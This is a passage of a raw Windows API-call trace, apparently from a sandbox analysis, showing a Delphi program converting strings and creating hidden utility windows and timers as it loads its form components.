| out: lpWideCharStr="Left杭") returned 4 [0281.675] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Left", cchWideChar=4, lpMultiByteStr=0x634a31c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LeftT", lpUsedDefaultChar=0x0) returned 4 [0281.676] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358518, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0281.676] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358518, cbMultiByte=3, lpWideCharStr=0x6351680, cchWideChar=3 | out: lpWideCharStr="Topt杭") returned 3 [0281.676] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top", cchWideChar=3, lpMultiByteStr=0x634a2dc, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Top", lpUsedDefaultChar=0x0) returned 3 [0281.676] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x634a138, cbMultiByte=18, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 18 [0281.676] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x634a138, cbMultiByte=18, lpWideCharStr=0x6366de8, cchWideChar=18 | out: lpWideCharStr="TApplicationEvents") returned 18 [0281.676] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x634a138, cbMultiByte=19, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19 [0281.676] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x634a138, cbMultiByte=19, lpWideCharStr=0x637c488, cchWideChar=19 | out: lpWideCharStr="ApplicationMEvents1") returned 19 [0281.676] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x60d99c5, cbMultiByte=6, lpWideCharStr=0x634a13c, cchWideChar=7 | out: lpWideCharStr="TTimer") returned 6 [0281.676] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TTimer", cchCount1=6, lpString2="TApplicationEvents", cchCount2=18) returned 3 [0281.676] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x60c4767, cbMultiByte=6, lpWideCharStr=0x634a13c, cchWideChar=7 | out: lpWideCharStr="TLabel") returned 6 [0281.676] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TLabel", cchCount1=6, lpString2="TApplicationEvents", cchCount2=18) returned 3 [0281.676] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x61d508f, cbMultiByte=18, lpWideCharStr=0x637c48c, cchWideChar=19 | out: lpWideCharStr="TApplicationEvents") returned 18 [0281.676] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TApplicationEvents", cchCount1=18, lpString2="TApplicationEvents", cchCount2=18) returned 2 [0281.676] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534f581, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Ä7\x06çF}wTÄ7\x06\x88½+", lpUsedDefaultChar=0x0) returned 0 [0281.676] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534f595, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0281.676] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ApplicationMEvents1", cchWideChar=19, lpMultiByteStr=0x534f595, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ApplicationMEvents1", lpUsedDefaultChar=0x0) returned 19 [0281.676] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0281.676] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=11, lpWideCharStr=0x63601c8, cchWideChar=11 | out: lpWideCharStr="OnException") returned 11 [0281.676] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OnException", cchWideChar=11, lpMultiByteStr=0x637c48c, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OnException", lpUsedDefaultChar=0x0) returned 11 [0281.676] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6360218, cbMultiByte=28, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 28 [0281.676] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6360218, cbMultiByte=28, lpWideCharStr=0x636dc98, cchWideChar=28 | out: lpWideCharStr="ApplicationMEvents1Exception") returned 28 [0281.676] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ApplicationMEvents1Exception", cchWideChar=28, lpMultiByteStr=0x534f4e5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ApplicationMEvents1Exception°óuéý", lpUsedDefaultChar=0x0) returned 28 [0281.676] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358538, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0281.676] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358538, cbMultiByte=4, lpWideCharStr=0x6351668, cchWideChar=4 | out: lpWideCharStr="Left潩n\x01") returned 4 [0281.676] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Left", cchWideChar=4, lpMultiByteStr=0x634a31c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Left", lpUsedDefaultChar=0x0) returned 4 [0281.676] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358538, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0281.676] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358538, cbMultiByte=3, lpWideCharStr=0x6351668, cchWideChar=3 | out: lpWideCharStr="Topt潩n\x01") returned 3 [0281.677] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top", cchWideChar=3, lpMultiByteStr=0x634a2dc, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Top", lpUsedDefaultChar=0x0) returned 3 [0281.677] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0281.677] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=6, lpWideCharStr=0x6351668, cchWideChar=6 | out: lpWideCharStr="TTimerೠص\x02") returned 6 [0281.677] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x634a298, cbMultiByte=14, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0281.677] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x634a298, cbMultiByte=14, lpWideCharStr=0x63601c8, cchWideChar=14 | out: lpWideCharStr="tmr3nv14M8ConfȑضҰ\x02") returned 14 [0281.677] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x60d99c5, cbMultiByte=6, lpWideCharStr=0x634a29c, cchWideChar=7 | out: lpWideCharStr="TTimer") returned 6 [0281.677] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TTimer", cchCount1=6, lpString2="TTimer", cchCount2=6) returned 2 [0281.677] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534f581, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="¢4\x06çF}wÜ¢4\x06\x88½+", lpUsedDefaultChar=0x0) returned 0 [0281.677] GetClassInfoW (in: hInstance=0x5fc0000, lpClassName="TPUtilWindow", lpWndClass=0x534f680 | out: lpWndClass=0x534f680) returned 1 [0281.677] CreateWindowExW (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x5fc0000, lpParam=0x0) returned 0x1011e [0281.677] SetWindowLongW (hWnd=0x1011e, nIndex=-4, dwNewLong=54660973) returned 100465804 [0281.678] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534f595, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0281.678] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmr3nv14M8Conf", cchWideChar=14, lpMultiByteStr=0x534f595, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmr3nv14M8Conf", lpUsedDefaultChar=0x0) returned 14 [0281.678] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0281.678] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=7, lpWideCharStr=0x634a298, cchWideChar=7 | out: lpWideCharStr="Enabledr") returned 7 [0281.678] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Enabled", cchWideChar=7, lpMultiByteStr=0x63601cc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Enabled", lpUsedDefaultChar=0x0) returned 7 [0281.678] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="False", cchWideChar=5, lpMultiByteStr=0x634a35c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="False", lpUsedDefaultChar=0x0) returned 5 [0281.678] KillTimer (hWnd=0x1011e, uIDEvent=0x1) returned 0 [0281.678] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0281.678] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=8, lpWideCharStr=0x634a318, cchWideChar=8 | out: lpWideCharStr="Intervald") returned 8 [0281.678] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Interval", cchWideChar=8, lpMultiByteStr=0x6366d8c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Interval8", lpUsedDefaultChar=0x0) returned 8 [0281.678] KillTimer (hWnd=0x1011e, uIDEvent=0x1) returned 0 [0281.678] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0281.678] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=7, lpWideCharStr=0x634a298, cchWideChar=7 | out: lpWideCharStr="OnTimered") returned 7 [0281.678] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OnTimer", cchWideChar=7, lpMultiByteStr=0x63601f4, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OnTimer", lpUsedDefaultChar=0x0) returned 7 [0281.678] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x634a338, cbMultiByte=19, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19 [0281.678] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x634a338, cbMultiByte=19, lpWideCharStr=0x637c450, cchWideChar=19 | out: lpWideCharStr="tmr3nv14M8ConfTimers") returned 19 [0281.678] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmr3nv14M8ConfTimer", cchWideChar=19, lpMultiByteStr=0x534f4e5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmr3nv14M8ConfTimer\x13", lpUsedDefaultChar=0x0) returned 19 [0281.678] KillTimer (hWnd=0x1011e, uIDEvent=0x1) returned 0 [0281.678] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358538, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0281.678] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358538, cbMultiByte=4, lpWideCharStr=0x6351680, cchWideChar=4 | out: lpWideCharStr="Leftp") returned 4 [0281.678] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Left", cchWideChar=4, lpMultiByteStr=0x634a29c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LeftT", lpUsedDefaultChar=0x0) returned 4 [0281.678] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358538, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0281.678] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358538, cbMultiByte=3, lpWideCharStr=0x6351680, cchWideChar=3 | out: lpWideCharStr="Toptp") returned 3 [0281.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top", cchWideChar=3, lpMultiByteStr=0x634a31c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Top", lpUsedDefaultChar=0x0) returned 3 [0281.679] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0281.679] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=6, lpWideCharStr=0x6351680, cchWideChar=6 | out: lpWideCharStr="TTimer") returned 6 [0281.679] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0281.679] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=7, lpWideCharStr=0x634a318, cchWideChar=7 | out: lpWideCharStr="tmrM8LGer") returned 7 [0281.679] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x60d99c5, cbMultiByte=6, lpWideCharStr=0x634a31c, cchWideChar=7 | out: lpWideCharStr="TTimer") returned 6 [0281.679] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TTimer", cchCount1=6, lpString2="TTimer", cchCount2=6) returned 2 [0281.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534f581, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="¢4\x06çF}wÜ¢4\x06\x88½+", lpUsedDefaultChar=0x0) returned 0 [0281.679] GetClassInfoW (in: hInstance=0x5fc0000, lpClassName="TPUtilWindow", lpWndClass=0x534f680 | out: lpWndClass=0x534f680) returned 1 [0281.679] CreateWindowExW (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x5fc0000, lpParam=0x0) returned 0x10120 [0281.680] SetWindowLongW (hWnd=0x10120, nIndex=-4, dwNewLong=54660960) returned 100465804 [0281.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534f595, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0281.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrM8LG", cchWideChar=7, lpMultiByteStr=0x534f595, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrM8LG", lpUsedDefaultChar=0x0) returned 7 [0281.680] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0281.680] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=7, lpWideCharStr=0x634a318, cchWideChar=7 | out: lpWideCharStr="Enabledr") returned 7 [0281.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Enabled", cchWideChar=7, lpMultiByteStr=0x63601f4, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Enabled", lpUsedDefaultChar=0x0) returned 7 [0281.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="False", cchWideChar=5, lpMultiByteStr=0x634a37c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="False", lpUsedDefaultChar=0x0) returned 5 [0281.680] KillTimer (hWnd=0x10120, uIDEvent=0x1) returned 0 [0281.680] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0281.680] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=8, lpWideCharStr=0x634a298, cchWideChar=8 | out: lpWideCharStr="Intervald") returned 8 [0281.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Interval", cchWideChar=8, lpMultiByteStr=0x6366d8c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Interval", lpUsedDefaultChar=0x0) returned 8 [0281.680] KillTimer (hWnd=0x10120, uIDEvent=0x1) returned 0 [0281.680] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0281.680] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=7, lpWideCharStr=0x634a318, cchWideChar=7 | out: lpWideCharStr="OnTimered") returned 7 [0281.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OnTimer", cchWideChar=7, lpMultiByteStr=0x63601cc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OnTimer", lpUsedDefaultChar=0x0) returned 7 [0281.680] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=12, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0281.680] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=12, lpWideCharStr=0x63601c8, cchWideChar=12 | out: lpWideCharStr="tmrM8LGTimer") returned 12 [0281.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrM8LGTimer", cchWideChar=12, lpMultiByteStr=0x534f4e5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrM8LGTimer", lpUsedDefaultChar=0x0) returned 12 [0281.680] KillTimer (hWnd=0x10120, uIDEvent=0x1) returned 0 [0281.680] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358538, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0281.681] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358538, cbMultiByte=4, lpWideCharStr=0x6351668, cchWideChar=4 | out: lpWideCharStr="Left浩牥\x01") returned 4 [0281.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Left", cchWideChar=4, lpMultiByteStr=0x634a31c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LeftT", lpUsedDefaultChar=0x0) returned 4 [0281.681] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358538, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0281.681] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358538, cbMultiByte=3, lpWideCharStr=0x6351668, cchWideChar=3 | out: lpWideCharStr="Topt浩牥\x01") returned 3 [0281.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top", cchWideChar=3, lpMultiByteStr=0x634a29c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Top", lpUsedDefaultChar=0x0) returned 3 [0281.681] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0281.681] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=6, lpWideCharStr=0x6351668, cchWideChar=6 | out: lpWideCharStr="TTimerೠص\x02") returned 6 [0281.681] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0281.681] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=9, lpWideCharStr=0x634a298, cchWideChar=9 | out: lpWideCharStr="tmrBx8M4v") returned 9 [0281.681] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x60d99c5, cbMultiByte=6, lpWideCharStr=0x634a29c, cchWideChar=7 | out: lpWideCharStr="TTimer") returned 6 [0281.681] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TTimer", cchCount1=6, lpString2="TTimer", cchCount2=6) returned 2 [0281.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534f581, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="¢4\x06çF}wÜ¢4\x06\x88½+", lpUsedDefaultChar=0x0) returned 0 [0281.681] GetClassInfoW (in: hInstance=0x5fc0000, lpClassName="TPUtilWindow", lpWndClass=0x534f680 | out: lpWndClass=0x534f680) returned 1 [0281.681] CreateWindowExW (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x5fc0000, lpParam=0x0) returned 0x10122 [0281.682] SetWindowLongW (hWnd=0x10122, nIndex=-4, dwNewLong=54660947) returned 100465804 [0281.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534f595, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0281.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrBx8M4v", cchWideChar=9, lpMultiByteStr=0x534f595, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrBx8M4v", lpUsedDefaultChar=0x0) returned 9 [0281.682] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0281.682] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=8, lpWideCharStr=0x634a298, cchWideChar=8 | out: lpWideCharStr="Interval") returned 8 [0281.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Interval", cchWideChar=8, lpMultiByteStr=0x6366d8c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Interval8", lpUsedDefaultChar=0x0) returned 8 [0281.682] KillTimer (hWnd=0x10122, uIDEvent=0x1) returned 0 [0281.682] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0281.682] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=7, lpWideCharStr=0x634a298, cchWideChar=7 | out: lpWideCharStr="OnTimerl") returned 7 [0281.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OnTimer", cchWideChar=7, lpMultiByteStr=0x636021c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OnTimer", lpUsedDefaultChar=0x0) returned 7 [0281.682] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x634a318, cbMultiByte=14, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0281.682] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x634a318, cbMultiByte=14, lpWideCharStr=0x6360218, cchWideChar=14 | out: lpWideCharStr="tmrBx8M4vTimer") returned 14 [0281.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrBx8M4vTimer", cchWideChar=14, lpMultiByteStr=0x534f4e5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrBx8M4vTimer", lpUsedDefaultChar=0x0) returned 14 [0281.682] KillTimer (hWnd=0x10122, uIDEvent=0x1) returned 0 [0281.682] SetTimer (hWnd=0x10122, nIDEvent=0x1, uElapse=0xea60, lpTimerFunc=0x0) returned 0x1 [0281.682] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358538, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0281.682] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358538, cbMultiByte=4, lpWideCharStr=0x6351680, cchWideChar=4 | out: lpWideCharStr="Leftv") returned 4 [0281.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Left", cchWideChar=4, lpMultiByteStr=0x634a29c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LeftT", lpUsedDefaultChar=0x0) returned 4 [0281.682] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358538, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0281.684] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358538, cbMultiByte=3, lpWideCharStr=0x6351680, cchWideChar=3 | out: lpWideCharStr="Toptv") returned 3 [0281.684] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top", cchWideChar=3, lpMultiByteStr=0x634a35c, cbMultiByte=10, lpDefaultChar=0x0, 